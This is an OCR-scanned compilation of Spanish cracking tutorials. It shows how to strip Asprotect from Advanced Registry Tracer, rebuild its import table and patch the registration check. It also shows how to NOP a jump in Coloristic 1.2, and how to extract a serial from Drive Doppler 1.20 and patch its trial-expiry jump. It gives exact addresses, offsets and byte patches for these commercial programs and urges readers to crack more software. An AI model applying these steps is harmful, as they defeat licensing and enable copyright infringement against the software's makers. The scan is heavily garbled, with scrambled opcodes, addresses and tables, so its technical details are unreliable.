1090/— Cr4424 18 6081 NOU DWORD PTR SS: [ESP+1 


Y Mágicamente se para en el Entry Point estamos en: 


AAA ARO AR Program Entry Point ES 


004DDD54 .55 PUSH EBP 

004DDD55 .8BEC MOV EBP,ESP 

004DDD57 . 83C4 F4 ADD ESP,-0C 

004DDD5A .B8 84DA4D00 MOV EAX,ART.004DDA84 
004DDD5F .ES 9489F2FF CALL ART.004066F8 


Para poder dumpear el programa. hay un Plugins en Olly OLLYDUMP, 
que lo hace el solito, una vez detenido el programa en el OEP, lo 
bajamos de memoria. 


A—————————— 


OlbyDump - Art.exe 


Stark Addresz: [400000 


Entry Point: 11000 -> Madihy: [DDD54 Get ElP as DEP | Cancel | 
Base of Code: Í 000 Base of Data: [DEGOO 


1 Fiz Raw Size £ Dffeet of Dump Image 


Section 


Wirtual Size 


D000 5000 
DO0DOS000 
00035000 
O0003000 
000017 0001 
00001 0001 
000€ 00101 


irtual O Ifoet 


00007 00101 
000€ 000 
00€ 1 00101 
00116000 
0011300101 
001180010 
001180010 


Size: [172000 


Far Sie 


D000 5000 
D000S0001 
00035000 
O0003000 
00001 0001 
00001 0001 
000€ 0001 


Raw Offset 


00007 00101 
O000é 000 
000€ 1 0001 
00116000 
0011 30001 
00118000 
00178000 


Charactaristic e 


20000040 
20000040 
20000040 
Co000040 
200000410 
20000040 
20000040 


£ 
| Rebuild IT using "reblT.dll'" by pOda 


Si no tenemos ese Plugins, utilizaremos la forma tradicional. 


Entonces una vez que el programa quedó detenido en el OEP, 
ejecutamos Memory Dumper, seleccionamos el proceso que nos 
interesa (Art.exe), cargamos los datos obtenidos con PEditor, 
seleccionamos el nombre del archivo que le daremos al dumpeado, y le 
damos click en Dump Memory: Con esto ya está dumpeado el AIP. 
Solo faltan reparar los valores de comienzo y fin de las secciones como 
así también el OEP, para lo cual volvemos a usar PEditor: Dentro del 
frame Tables damos click en Sections y se desplegará una tabla con las 
secciones de AIP. Entonces click derecho (si no se es zurdo) sobre 
alguna de las secciones, y seleccionar la opción dumpfixer 
[RS=VS]J8[RO=VO]. Cerrar esta ventana, ir a la frame File info y 
modificar el Entry Point restándole la base al valor obtenido con PE¡D 
(o sea cambiar 00001000 por 000DDD54). Guardar los cambios y salir 
de PEditor. Una vez hecho esto se verá que el dumpeado ya tiene el 
ícono original. 


Reparación de la Tabla de Importaciones (IAT). 


Generalmente la mayoría de los compresores nuevos destruyen la 
tabla de funciones importadas, para que no puedan arrancarse y 
apenas arranquen den errores varios de WINDOWS. 


Asprotect, como otros empaquetadores, dejan la tabla de 
importaciones (IAT) inservible y el dumpeado no puede ejecutarse 
correctamente, por lo tanto es necesario reparar esto. Para este caso 
ya está todo escrito en el tutorial y no es necesario anotar nada, pero 
es recomendable usar papel y lápiz para llevar nota en todo el proceso 
de reparación de la IAT, ya que puede haber varias entradas corruptas 
y con que nos equivoquemos en reparar una, habrá que revisar todas 
nuevamente. Lo primero a hacer es ejecutar ATR nuevamente seguido 
de Revirgin. Donde dice Select Process To Attach se debe seleccionar 
art.exe. Luego hay que cargar el OEP, pero en este caso incluida la 
Image Base (o sea 004DDD54), hacer click en Fetch IAT, para obtener 
el RVA de la IAT y su tamaño Length). 


l4T Resolver | Load resolved! lAT Star Bva (001161 ES  ITRYA A 
| | | 00000740 on 
Resolve again Save resolved| lAT Length [oo IT Length 


DEP |004ddd5s (Fachiar 


O OSO - 


search high limi 


Una vez finalizado eso le damos click al botón IAT Resolver seguido de 
Resolve again, y seleccionamos Show Unresolved para ver las entradas 
que generan conflicto: 


Quedaron 11 entradas sin resolver. Algunas de estas entradas serán 
resueltas con el mismo Revirgin las verdaderas, pero con otras será 
necesario usar un editor hexadecimal. Para ver cuales podemos 
reparar con el Revirgin y cuales no, debemos dejar a ATR parado en el 
OEP nuevamente, usando OllyDbg como expliqué antes. 


Yo suelo construir una tabla e ir anotando para tener las cosas mas 
claras. 


Para encontrar el sitio en el archivo volcado: 


Busco en 19 FF25B861 ( 0011618B8 los bit al revés ) 


Dirección 


003E0EF4 | 
003E1334 | 
003E1394 | 
003E1334 | 


0OZE13AC: 


003E1350 


[ATRva 


001161B8 
001161BC 
001161CC 
0011626C 
00116320 


00116364 


003E0EF4 | 
003E1334 | 
003E1388 | 


003E1394 


003E13BC 


0011637C 


00116380 


001163A4 


001163B0 


001163B8 


En 
ejecutable 
volcado 


004012E0 
004012D8 
004012B8 
004065F8 
004069AC 


00406924 


Solución 


kernel32.GetProcAddress 
77E5A5FD 
kernel32.GetModuleHandleA 
77E59F93 
Mov EAX, 00051EEO0, Ret 
B8E0150500C3 
kernel32.GetModuleHandleA 
77E59F93 

RETN 4 nop nop nop C2 
0400909090 
Mov EAX, 050128A0, Ret 
A1E85C3E00C3 


004068F4 
004068EC 
004068A4 
0040688C 


0040687C 


kernel32.GetProcAddress 
77E55AFD 
kernel32.GetModuleHandleA 
77E59F93 
Mov EAX, 004DDD54, Ret 
B854DD4D00C3 
Mov EAX, 00051EEO0, Ret 
B8E0150500C3 

RETN 4 nop nop nop C2 
0400909090 


Después de todo este trabajo viene lo bueno, paramos el ejecutable 
(Comprimido) en el OEP ,y un bpx en cada dirección ( yo suelo poner 


en las ejecutable volcado pero se pueden poner también en IATRva. 
Una vez parado en el Bpx anotamos la Api y su dirección. 


La 1 (4012E0) 


OO3E0EF4 55 PUSH EBP 

OO3ED0EF5  8BEC MOV EBP,ESP 

OO3E0EF7  8B55 0C MOV EDX,DWORD PTR SS:[EBP+C] 
OO3EOEFA —8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 
OO3EOEFD  8B0D 3C443E00 MOV ECX,DWORD PTR DS:[3E443C] 
OO3EOFO3  8B09 MOV ECX,DWORD PTR DS:[ECX] 
OO3EOFO5  3BC8 CMP ECX,EAX 

OO3E0FO7 7509 JNZ SHORT 003E0F12 


OO3EO0F09  8B0495 50433E00 MOV EAX,DWORD PTR 
DS:[EDX*4+3E4350] 


003E0F10  EB 07 JMP SHORT 003E0F19 

003E0F12 52 PUSH EDX 

003E0F13 50 PUSH EAX 

003E0F14 E8 4742FFFF CALL 003D5160 , 
JMP to kernel32.GetProcAddress 

003E0F19 5D POP EBP 

0O3EOF1ÍA  C2 0800 RETN 8 


* Esta es verdadera pues si la nopeamos en el comprimido no chuta, 
así pues para Revingin. 


kernel32.GetProcAddress 77E5A5FD 


La 20 (4012D8) 


003E1334 55 PUSH EBP 
003E1335  8BEC MOV EBP,ESP 
003E1337  8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 


OO3E133A  85C0 TEST EAX,EAX 


003E133C 7507 JNZ SHORT 003E1345 

003E133E Al 78593E00 MOV EAX,DWORD PTR DS:[3E5978] 
003E1343 FEB 06 JMP SHORT 003E134B 

003E1345 50 PUSH EAX 

003E1346 E8 OD3EFFFF CALL 003D5158 

JMP to kernel32.GetModuleHandleA 


003E134B 5D POP EBP 
003E134C  C2 0400 RETN 4 
003E134F 90 NOP 


* Esta es verdadera pues si la nopeamos en el comprimido no chuta, 
así pues para Revingin. 
kernel32.GetModuleHandleA 77E59F93 


La 3 (4012B8) 

003E1394  6A 00 PUSH 0 

003E1396 E8 BD3DFFFF CALL 003D5158 

- JMP to kernel32.GetModuleHandleA 

003E139B  FF35 E85C3E00 PUSH DWORD PTR DS:[3E5CE8] 
003E13A1 58 POP EAX 

003E13A2 8B05 F3835C3E00 MOV EAX,DWORD PTR 
DS:[3E5CF8] 

003E13A8 C3 RETN 


** Aquí Asproted quiere hacer de las suyas, primero nos trata 
de hacer creer que es, 

JMP to kernel32.GetModuleHandleA, pero después nos 
mete un valor en Eax 
Eax=00051EEO0O 


La 4 (004065F8) 
003E1334 55 PUSH EBP 

003E1335  8BEC MOV EBP,ESP 

003E1337 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 


OO3E133A  85C0 TEST EAX,EAX 


0O3E133C 7507 JNZ SHORT 003E1345 

0O3E133E Al 78593E00 MOV EAX,DWORD PTR DS:[3E5978] 
003E1343  EB 06 JMP SHORT 003E134B 

003E1345 50 PUSH EAX 


003E1346 E8 OD3EFFFF CALL 003D5158 
JMP to kernel32.GetModuleHandleA 
003E134B 5D POP EBP 

003E134C  C2 0400 RETN 4 


* Esta es verdadera pues si la nopeamos en el comprimido no chuta, 
así pues para Revingin. 
kernel32.GetModuleHandleA 77E59F93 


La 5 (004069AC) 
003E13AC 55 PUSH EBP 

003E13AD SBEC MOV EBP,ESP 
003E13AF 8SB05 F85C3E00 MOV EAX,DWORD PTR 
DS:[3E5CF8] 


003E13B5 8B45 08 MOV EAX,DWORD PTR 
SS:[EBP+8] 

003E13B8 5D POP EBP 

003E13B9 C20400 RETN 4 


** Esta es súper falsa no hay apis por ningún sitio. 


La 6(00406924) 

003E1350  6A 00 PUSH 0 

003E1352 6E8013EFFFF CALL 003D5158 : 
JMP to kernel32.GetModuleHandleA 

003E1357 FF35 E85C3E00 PUSH DWORD PTR 
DS:[3E5CE8] 

003E135D 58 POP EAX 

003E135E C3 RETN 


**x Aquí Asproted quiere hacer de las suyas, primero nos trata 


de hacer creer que es, 


JMP to kernel32.GetModuleHandleA, pero después nos 


mete un valor en Eax 
Eax=0A280105 


La 7 (4068F4) 

003E0EF4 55 

003E0EF5  8BEC 

003E0EF7 8B55 0C 
003EO0EFA 8B45 08 
003E0EFD 8B0D 3C443E00 
DS:[3E443C] 

003E0F0O3  8B09 

003E0FO5 3BC8 

003E0F0O7 7509 


PUSH EBP 

MOV EBP,ESP 

MOV EDX,DWORD PTR SS:[EBP+C] 
MOV EAX,DWORD PTR SS:[EBP+8] 
MOV ECX,DWORD PTR 


MOV ECX,DWORD PTR DS:[ECX] 
CMP ECX,EAX 
JNZ SHORT 003E0F12 


OO3EOFO9  8B0495 50433E00 MOV EAX,DWORD PTR 


DS:[EDX*4+3E4350] 
OO3EOF10  EB 07 
0O03E0F12 52 

OO3E0OF13 50 

003E0F14 ES 4742FFFF 
003D5160 

OO3EO0F19 5D 

OO3EOFÍA  C2 0800 


La 8 (4068EC) 


003E1334 55 
003E1335  8BEC 
003E1337  8B45 08 
OO3E133A  85C0 


JMP SHORT 003E0F19 
PUSH EDX 
PUSH EAX 
CALL 
- JMP to kernel32.GetProcAddress 
POP EBP 
RETN 8 


PUSH EBP 

MOV EBP,ESP 

MOV EAX,DWORD PTR SS:[EBP+8] 
TEST EAX,EAX 


0O3E133C 7507 JNZ SHORT 003E1345 
0O03E133E Al 78593E00 MOV EAX,DWORD PTR DS:[3E5978] 


003E1343 FEB 06 JMP SHORT 003E134B 

003E1345 50 PUSH EAX 

003E1346 6£E8OD3EFFFF CALL 003D5158 . 
JMP to kernel32.GetModuleHandleA 

003E134B 5D POP EBP 

003E134C  C2 0400 RETN 4 


* Esta es verdadera pues si la nopeamos en el comprimido no chuta, 
así pues para Revingin. 
kernel32.GetProcAddress 77E5A5FD 


La 9 (00406844 >) 

003E1388 £E8E33DFFFF — CALL 003D5170 
JMP to kernel32.GetVersion 

003E138D Ai F45C3E00 MOV EAX,DWORD PTR 
DS:[3E5CF4] 

003E1392 C3 RETN 


**x Aquí Asproted quiere hacer de las suyas, primero nos trata 
de hacer creer que es, ; JMP to kernel32.GetVersion , pero 
después nos mete un valor en Eax, después de probar varias 
veces vemos que este valor cambia. 

Eax= Varios valores diferentes. 


La 10 (0040688C) 

003E1394  6A 00 PUSH 0 

003E1396 E8 BD3DFFFF CALL 003D5158 

- JMP to kernel32.GetModuleHandleA 

003E139B  FF35 E85C3E00 PUSH DWORD PTR DS:[3E5CE8] 
003E13A1 58 POP EAX 

003E13A2 8B05 F85C3E00 MOV EAX,DWORD PTR 


DS:[3E5CF8] 
003E13A8 C3 RETN 


**x Aquí Asproted quiere hacer de las suyas, primero nos trata 
de hacer creer que es, 

JMP to kernel32.GetModuleHandleA, pero después nos 
mete un valor en Eax 
Eax=00051EEO0O 


La 11 (0040687C) 


003E13BC 55 PUSH EBP 
003E13BD 8BEC MOV EBP,ESP 
O0O3E13BF 5D POP EBP 


003E13C0 C20400  RETN 4 


** Esta es súper falsa no hay apis por ningún sitio. 


Después de todo este lió, sólo queda decidir cual de las entadas son 
falsas, y cuales no, (serán falsas todas las al final antes del ret muevan 
algo a Eax, que sea una dirección de memoria ( están resaltadas 
amarillo ) y las que no contengan apis, están resaltadas en verde. 


Ya sólo queda una cosa obtener la dirección de las apis verdaderas, 
con OLLY parado en en OEFP, seleccionar executable modulos ( 
ALT+B), y alli kernel32.dll 


bxecutable modules 


NES 
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1 
1 
1 
1 


Export GetPrivateProf ilelntA 


TrE+é6FCS Export GetPrivateProf ilelnti 

TrE424654 Export GetPrivateProf ileSectionA 
FrEd1iFOZ Export GetPrivateFrof ileSectionhame=sA 
TrE924590 Export GetPrivateProf ileSect ionHame=li 
PrEAFOBGB Export GetPrivateProf ileSsectiionli 
TrE52Có64 Export GetPrivateProf ilestrinsA 
TrE4ASAA Export GetPrivateProf ilestrinagll 
rE9dsBó Export GBetPrivateProf ilestructA 
TrE9do9BE Export GetPrivateProf ileStructll 
TTESASFO Export: GetProcHAddre== 

TrE46ADCc Export GetProcessHff initubdask 
TrE5rcBr Export GetProces=Heap 

TrErCcesz2 Export GetProces=Heap= 

rrE9326HA1 Export GetProces=sloCounter:s 


TrE95b6bE Export GetProces=sPriocituBoost 
TrE985FO Export GetProcess5hutdownParanmeters 
TrEréeFFS Export BetProces< Times 

TrES5C334 Export GetProces= ers Lon 


PrEd2233|. Export GetProces=hlorkingSetSize 


En la tabla anterior vemos como queda cada cosa. 


Con los datos obtenidos rellenamos el Revingin ( sólo las verdaderas). 


KERNEL32 dll GetProcáddres|77E554FD 00116188 
KERNEL32 dll GetModuleHan 77E59F93 —[DO11618C 
100000000 IO3E1394 OOTIB1CE 


KERNEL32 dll | 00000000 |GetModuleHan| GetModuleH: 00116260 


DO0OD00O |... O03E13AC (00116320 


ODO0000d |. I003E1350 (00116364 
KERNEL32.dll [00000000 |GetProcáddres 77ES5AFD 00116370 
KERNEL32 dll | OODOO00O — |GetModuleHan! GetModuleH 

I000000d | [003138 00116344 

o O3E1394 00116380 
o I0OSEI3BC 00116388 


Le doy a generar y ya esta , acabado con el Revingin, 


Reparando entradas falsas: 


Ahora a corregir las falsas, yo suelo hacer una cosa con las entradas 
falsas,( muy útil para compatibilidad). 


10 Anoto el resultado de Eax al entrar en la Api y al salir de ella, si son 
iguale Parcheo solo con Ret o Ret 4 según sea, si no son iguales 
anoto el valor que dejan en Eax antes del Ret. 


20 Apago el Ordenata y vuelvo a seguir el proceso hasta cada entrada 


falsa, ahora comparo los valores de cada entrada con los anteriores, si 
son iguales parcheo con Mov Eax= Valor devuelto, Ret. (Entrada 
3,6,10) 


30 Si no lo son el Exe creado no chutara bien para solucionarlo 
parcheo con, Mov Eax=0EP ,Ret (Como entrada 9 ). 


Con editor Hexa, cambiamos los bites en el EXE según la tabla , y ya 
esta milagoso. 


Hecho esto, podemos dar por terminado el proceso de recontruir la 
ITA. 


Probamos el Exe creado y Chuta ¡! Bien Bien Bien 


Codificar el Patch! | 


Esta parte la haré muy por encima pues sólo la realizo porque el 
programa es muy útil para nosotros, lo interesante era hacer correr el 
programa sin Asproted, y ya se ha conseguido. 


Cargamos el Exe volcado y funcionando en Olly le ejecutamos, nos sale 
la Nag. 


Advanced Registry Tracer (Unregistered) 


“version 1.60 


2 ElcomSoft Ltd 2002 
E-Mail artídelcomeoft com 
http: dt elcomeoft corn art. Fr 


THANE YOU FOR TRYING AOWAáNCED REGISTRY TRACER | 
e hope vou enjor ik 
This unregistered werelon le for evaluation Use or. 
The registered version does not display his notice 


| understand that | may use this program only for evaluation (30 days] 
and that any other use requires purchase ob a licenze. 


There are 27 days left in your evaluation period 


Le damos a Register, y nos sale el cartelito de, The registration 
code is invalid!. 


Buscamos en Olly todas las referencias de texto,y vemos estas 
interesantes: 


004B7B08 |. B8 447C4B00 MOV EAX,Dump.004B7C44 
| ASCII "Thank you for registering !” 


004B7B2B |. B8 687C4B00 MOV EAX,Dump.004B7C68 
| ASCII "The registration code is invalid!" 


004B7B42 |. B8 687C4B00 MOV EAX,Dump.004B7C68 


; [ASCII "The registration code is invalid!" 


Un bp a cada una de ellas y Olly para en, 0O4B7B42 , el cual viene de 
un salto en 004B7AB2 , 


004B7AAB |. ES FSEAFFFF CALL Dump.004B65A8 
004B7ABO |. 84C0 TEST AL,AL 
004B7AB2 |. 74 6C JE SHORT Dump.004B7B20 


La clave de todo esta en la call, nos metemos dentro y: 


004B65F2 |. 8B1485 10F14D>|MOV EDX,DWORD PTR 
DS:[EAX*4+4DF110] 

Clave Nuestra encriptada 

004B65F9 |. 8B45 FO [MOV EAX,DWORD PTR SS:[EBP-10] 
Clave buena encriptada 

004B65FC |. ES AF28F5FF |CALL Dump.00408EBO 

Compara claves 


004B6601 |. 85C0 [TEST EAX,EAX 
Comprueba el resultado 
004B6603 |. 75 06 |JNZ SHORT Dump.004B6606B 


Si no es bueno a error 


Modificando el salto el programa aceptara todas las claves 
(Menos la buena, Nadie es perfecto). 


Nota: 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. 


+Er(dser'2000/GT2 


Si deseas ponerte en contacto con nosotros puedes hacerlo 


aquí: Group Tutoriales 2003 - GT2 


e Si deseas aparecer en la compilación envía tu tutorial a: 
profesor_xOhotmail.com 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para 
incrementar sus habilidades, pero recuerden, lean muchos tutoriales, 
practiquen, estudien y CRACKEAR será mucho más fácil. 


Titulo: 


Crackeando Coloristic 1.2 
Url del Programa: <http://www.bubblepop.com> 


|[Autor: Algarete 
|E-Mail: jry4k 4ehotmail.com 


|Nivel: Facil(x) Medio() Dificil () 


Utilidades: W32Dasm 8.9 y WinHex (o el de tu preferencia) 


Manos a la obra!. 


Primero que nada hay que investigar que tipo 


de proteccion lleva el programita este, 


lo abrimos ohh 


y que vemos no se si a ustedes pero a mi me salio un Reminder 
olvidemonos del nag y vamos a 


o un nag como lo quieran llamar , 
Help->Register... 
poner el nombre y serial. 
en mi caso "Algarete" y serial 
un click a Register y shit "You have entered an invalid..... M 


"12345" 


y como siempre no sale la tipica ventanita de 
oka! pongan cualquier nombre en el name 
(usa el que quieras) 


damos 
oOkA 


Ahora abrimos el W32Dasm y abrimos el Coloristic 1.2 damos click 
en String References y buscamos y no muy distante vemos nuestro 


mensaje de Error, 
Registering your copy... 


nos gusta 


* Possible Reference to String Resource ID=00500: 


y Caemos aqui: 


ohh pero que veo, 


registering your copy of Coloristic and showin" 


:00403C28 


68F4010000 


Caemos aqui! 


:00403C2D 
:00403C30 
:00403C31 
:00403C36 
:00403C37 
:00403C38 
:00403C3B 
:00403C3C 
:00403C3F 
:00403C42 
:00403C43 
:00403C48 
:00403C49 
:00403C4A 


oka, pero 
vemos: 


:00403C0C 
:00403C0F 
:00403C10 
:00403C13 
:00403C14 
:00403C17 
:00403C1C 
:00403C1F 


8D45F0 

50 
E80AE8FFEFF 
59 

59 

8D45F0 

50 

8B459C 
8B4004 

50 
E8B8E4FFEFF 
59 

59 

8D4DFO 


aqui no veo nada cool, 


8D45E4 
50 
8D45DC 

50 

8B4D9C 
E8E41C0000 
8B459C 
83B8D800000000 


push 000001F4 


lea eax, dword 
push eax 

call 00402440 
pop ecx 

pop ecx 

lea eax, dword 
push eax 

mov eax, dword 
mov eax, dword 
push eax 

call 00402100 
pop ecx 

pop ecx 

lea ecx, dword 


asi que subimos 


lea eax, dword 
push eax 

lea eax, dword 
push eax 

mov ecx, dword 
call 00405900 
mov eax, dword 


tambien veo esto "Thank you for 
." damos click a ese mensaje que es el que 


"Thank you for 


[ebp-10] 


ptr [ebp-64] 


[eax+04] 


ptr [ebp-10] 


un poquito a ver que 


ptr [ebp-1C] 


ptr [ebp-24] 
ptr [ebp-64] 


ptr [ebp-64] 


cmp dword ptr [eax+000000D8], 


00000000 <-- interesante 
:00403C26 7448 je 00403C70 <<-- Super 
interesante, que tal si nopeamos este salto? 


* Possible Ref to Menu: MenulD_0064, Item: "About Coloristic" 


* Possible Reference to String Resource ID=00500: "Thank you for 
registering your copy of Coloristic and showin" 


:00403C28 68F4010000 push 000001F4 

:00403C2D 8D45FO lea eax, dword ptr [ebp-101 
:00403C30 50 push eax 

:00403C31 E80AE8FFEFF call 00402440 


en el w32Dasm marcamos la direccion ":00403C26 7448 

je 00403C70" 

y miramos el offset vemos que es (00003026h) apuntamos la direccion en 
el WinHex 

(Position -> Go to Offset) 3026 y Caemos en 7448 lo nopeamos osea 
enves de 7448 

escribimos 9090 y listo , abrimos el prog. escribes tu nombre cualquier 
serial 

y Crackeado!! ¡) Facil no crees? 


Cracked by Algarete. jry4k 4ehotmail.com 
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Karpoff Spanish Tutor 


Programa: Drive Doppler 1.20 Release Candidate ++2! 


PROTECCION: Name / Serial, Limitacion de Tiempo. 


Descripcion: Comprueba que carpetas incrementan de tamaño 


Dificultad: 


Principiante 


DOWNLOAD: http://www .pinoyware.com/download/dop1212e.zip O ftp://ftp.gabtoof.com/shuffleplay/dop 1212e.zip 


Herramientas: SmartCheck 6.03, W32Dasm VB, Editor Hexadecimal 


Karpoff FECHA: 19/11/1999 


INTRODUCCION 


Hola gentes!! Bueno vamos a por el proyecto N*15 de los manuales para NewBies desde Cero, en este proyecto 
intentare explicar diferentes formas de crackear un mismo programa con diferentes herramientas, vamos a 
incorporar el SmartCheck este es un debugger para Visual Basic creado por Numega, es muy importante tener 
bien configurada esta herramienta para que nos muestre lo que queremos ver. 


A pesar de lo que podáis pensar esta herramienta es muy fácil de usar si el objetivo es sacar un Serial 
Number correcto, por supuesto que el tema se complica si se quieren seguir algún proceso especifico etc. 


Para configurar el smartcheck adjunto unos gif sacados de un manual que no encuentro en este momento, pero 
con los gif no teneis ningun problema. AQUÍ 


Limitaciones del programa 


Tenemos 21 dias de evaluacion en esos 21 dias podemos evaluar el programa sin 
restricciones y sin Nag, tenemos la posibilidad de registrarnos mediante el tipico 
NAME: COMPANI: REGKEY: 


Ata 


Con el SmartCheck localizaremos un Serial Number valido en cuestion de segundos, 


Con el W32dasmVB haremos que pasada la evaluacion el programa siga funcionando, 
localizando la rutina de fin de evaluacion y modificandola en beneficio nuestro y 


AL ATAKE 


PARTE 1 SMARTCHECK 6.03 


Empezamos... abrimos el SmartCheck Lo configurado como muestran los gif. Con la Opcion open seleccionamos el ejecutable dlopper.exe 


Es importante que tengais la barra de herramientas con los botones pulsados que se ven en la 
imagen, una vez cargado doppler.exe pulsamos la casilla start, inmediatamente se empieza a 
ejecutar nuestra victima pero ni se imagina que le estamos viendo las tripas. Si habeis 
configurado el SmartCheck como os sugeri, mientras se ejecuta el programa aparecera una 
ventana de error que dice asi Numega SmartChec Error Detectted pulsais la opcion Acknowledge 
tantas veces como os aparezca. 


Bueno el programa esta iniciado solo tenemos que meter los datos de registro en HelplEnter 
Key 


Meteis los datos que os de la gana yo puse. 


NAME: karpoff 


COMP: kk 
S/N : 8493 
Pulsamos OK y nos escupe el mensage Invalid Code!! Aceptamos y vamos al SmartCheck y 


pulsamos la casilla End, por que aunque el programa ha terminado de ejecutarse sigue creando 
eventos y no es lo mismo buscar un S/N en 200 lineas de codigo que en 20000 J. 


Bueno para localizar el S/N correcto yo hago lo siguiente, bien lo localizo mediante la 
funcion VbaStrCmp, VbaStrComp o introduciendo en la casilla de busqueda el S/N falso las 
dos opciones son utiles la primera es la funcion utilizada generalmente por Visual Basic 
para comparar los datos que hemos metido con los correctos y la segunda nos situa donde se 
encuentra el S/N que hemos metido y luego rastreando es facil encontrar el S/N correcto, en 
este caso utilizo la primera opcion osea que metemos en la casilla de busqueda vbastrcmp y 
pulsamos Enter 


2 veces, en este caso el S/N aparecio enseguida 


eb 


SysFreeString E unsigned short * string] = 00445740 
— vbaFreeStr retums DWORD:20 o ="2E92F40" 


_vbaStiMove(String:"2£92F40", LPESTR:DOGEFSB8) retar a Esunsigned sha string2 = 00540744 
Stina""2E92F40". € 493") retums DWO L ="g497" 


- aaFreESHLiAl) 
SysFreeStino[BSTR:00447D48] 


Sencillo no?? Vemos como se paro en la funcion _ vbaStrCmp y hay estan nuestros numeros 


Nuestro S/N : 8493 


S/N Correcto: 2E92F40 


Pero ... SORPRESA!! Realmente este numero no me sirve ni a mi, por que si os fijais este programa genera un numero 
cada vez que lo ejecutamos e intentamos registrarnos, este numero lo podemos ver en la parte superior de la ventana de 
registro, y dependiendo de este numero genera el S/N valido pero solo para esa ejecucion, osea que si no introduces el 
S/N que has capturado en la misma ejecucion no te sirve de nada. 


Asi que hay que repetir otra vez el proceso y sin cerrar el programa introducimos el serial capturado jejeje, o 
podemos pensar en otra forma de crackear el programa, esta vez haciendo un parcheo para que simule estar registrados 
(personalmente me gusta mas lo del parcheo que localizar el S/N) 


PARTE 2 


Bueno lo primero hacer una copia del ejecutable doppler.exe con el nombre por ejemplo doppler2.exe, desensamblamos 
doppler.exe con el W32dasm VB (el que muestra las String Ref. en Prog. visual basic) si no lo teneis lo podeis 
descarar de mi pagina http: //welcome.to/karpoff en la seccion herramientas, seguimos.. con el editor Hex editamos 
doppler2.exe y adelantamos la fecha de Windows 1 mes para trabajar con el programa expirado. 


Ejecutamos el programa para ver que hace cuando esta caducado, vemos que nos muestra un aviso diciendo que el programa 
ha expirado nos da la opcion de rellenar el registro si fallamos el programa no llega a ejecutarse. 


ATAKE 


Podemos localizar la rutina que se encarga de comprobar el S/N y manipularla o tambien podemos localizar la rutina que 
decide si el programa esta caducado o no y modificarla en beneficio nuestro, cual cogemos yo opto por la segunda, creo 
que la primera opcion es la que suelo mostrar en otros manuales asi que vamos a impedir que el programa caduque. La 
teoria: a partir del mensaje de error analizaremos el codigo y veremos donde y como toma la decision de que el 
programa no se ejecute por estar caducado, localizado esto pasaremos a modificar el codigo. 


Estamos en el W32dasmVB con el programa desensamblado, pulsamos la boton de las Strg-Ref. y buscamos entre las cadenas 
de texto el mensaje de expiracion: 


"Your 21-day trial period has expired. " 
Hacemos doble clip y nos lleva directamente a: 
" 


* Possible StringData Ref from Code Ob] ->"Your 21-day trial period has expired. 


00424E75 C78570FFFFFF18D04000 mov dword ptr [ebp+FFFFFF70], 0040D018 -AQUI 


Bueno analicemos el codigo para ver que coño pasa por que cuando pasan los 21 dias ya no funciona el programa. 


* Reference To: MSVBVM50.  vbaFreeStr, Ord:0000h 


:00424E1E FF1554E54200 Call dword ptr [0042E554] 
:00424E24 6685F6 test si, si 
:00424E27 0F843D010000 je 00424F6A - el responsable 


* Reference To: MSVBVM50.  vbaVarDup, Ord:0000h 


:00424E2D 8B35E4E44200 mov esi, dword ptr [0042E4E4] 


:00424E33 B804000280 mov eax, 80020004 


:00424E38 BBOA000000 mov ebx, 0000000A 


:00424E3D BF08000000 mov edi, 00000008 

:00424E42 8D9558FFFFFF lea edx, dword ptr [ebp+FFFFFFS8] 
:00424E48 8D4D98 lea ecx, dword ptr [ebp-68] 
:00424E4B 894580 mov dword ptr [ebp-80], eax 
:00424E4E 899D78FFFFEFF mov dword ptr [ebp+FFFFFF78], ebx 
:00424E54 894590 mov dword ptr [ebp-70], eax 
:00424E57 895D88 mov dword ptr [ebp-78], ebx 


* Possible StringData Ref from Code Obj ->"Sorry!" 


:00424E5A C78560FFFFFFB4BA4000 mov dword ptr [ebp+FFFFFF60], 0040BAB4 
:00424E64 89BD58FFFFEF mov dword ptr [ebp+FFFFFF58], edi 
:00424E6A FFD6 call esi 

:00424E6C 8D9568FFFFFF lea edx, dword ptr [ebp+FrFFFFF68] 
:00424E72 8D4DA8 lea ecx, dword ptr [ebp-58] 


Bueno esta bien sencillo no ?? Tenemos un bonito salto condicional en la direccion 00424E27 je 00424F6A que hace 
esto?? Bueno mientras estamos dentro del periodo de evaluacion el salto condicional se ejecuta llevándonos a 00424F6A 
evitando asi el temible aviso de expiracion, pero cuando han pasado los 21 dias este salto es como si no estaria y al 
no ejecutarse BooM!! Pantallazo y fuera del programa, pues ya sabemos que tenemos que hacer lo vamos a convertir en un 
salto incondicional, que se ejecute siempre asi nunca nos mostrara el Your 21-day tal tal... haber tenemos 


00424E27 0F843D010000 je 00424F6A y queremos 


00424827 ¿mp 00424F6A 


Como calculamos el valor en Hexa para que el salto nos lleve justo a la direccion de memoria que queremos 00424F6A 
Bueno con el propio W32dasm podemos hacerlo solo tenemos que pulsar CTRL+L para activar el debugger y hacer el parcheo 
en memoria, bueno pues eso pulsamos CTRL+L se abre la ventana de comandos y pulsamos load enseguida empieza el proceso 
de ejecucion y se abren numerosas ventanas pulsamos la opcion Goto Address y metemos la direccion de memoria del salto 
ouseaseeee 00424E27 aceptamos y el debugger nos situa justo en esa direccion ahora pulsamos Patch code y se abre una 
nueva ventana pues solo tenemos que meter los cambios que queremos hacer tecleamos 


jmp 00424F6A y pulsamos Enter 


Enseguida vereis Justo debajo como se ha generado la el valor que necesitamos para cambiar el salto. 


00424E27 E93E10000 JMP 00424F6A 


Ahora solo nos queda llevar a cabo los cambios localizamos la direccion del offset que la vemos en la barra inferior 
del W32dasm 24227 y vamos al Editor Hex 


Donde cambiamos 


0F843D010000 por E93E1000000 


y ya esta probamos a ejecutar doppler2.exe y olee!! El programa funciona, hacemos algunas pruebas para asegurarnos de 
que el parcheo no afecte a otras funciones del programa. 


Y todo esta en orden, pero podemos ser un poco mas elegantes si os fijais cuando arranca el programa vemos en el nag 


de presentacion you have 0 dais tal tal podemos cambiar eso por lo que pondria si estariamos registrados, ale pues 
hacemos lo mismo que antes localizar la rutina responsable de que se imprima la frase, buscamos you have en las string 
ref. y cliqueamos sobre la frase. 


Y aquí tenemos toda la movidilla 


:00424C2B FFD3 call ebx 
:00424C2D 6685F6 test si, si 
